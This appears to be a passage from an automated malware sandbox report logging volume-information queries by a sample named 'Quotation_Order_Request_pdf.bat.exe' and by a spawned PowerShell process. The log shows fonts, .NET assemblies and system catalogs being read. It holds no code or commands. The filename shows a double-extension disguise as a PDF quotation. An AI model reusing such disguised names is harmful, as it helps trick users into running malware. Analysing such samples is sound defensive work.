Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\pala.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\palai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\palab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\BKANT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\BASKVILL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_BI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_CR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\BOD_CI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\CALIFB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\CASTELAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\DUBAI-REGULAR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\DUBAI-LIGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\DUBAI-BOLD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\ELEPHNT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\ENGR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\GLECB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\GOTHICB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\IMPRISHA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\JOKERMAN.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\KUNSTLER.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\LFAXD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\LFAXI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\LHANDW.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\LSANSD.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\LSANSI.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\MATURASC.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\MISTRAL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\MOD20.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\MSUIGHUR.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\MTCORSVA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\MTEXTRA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\NIAGSOL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\PER_____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\PRISTINA.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\ROCC____.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\WINGDNG2.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\OFFSYMXL.TTF VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.CSharp\v4.0_4.0.0.0__b03f5f7f11d50a3a\Microsoft.CSharp.dll VolumeInformation	Jump to behavior
Source: C:\Users\user\Desktop\Quotation_Order_Request_pdf.bat.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Dynamic\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Dynamic.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
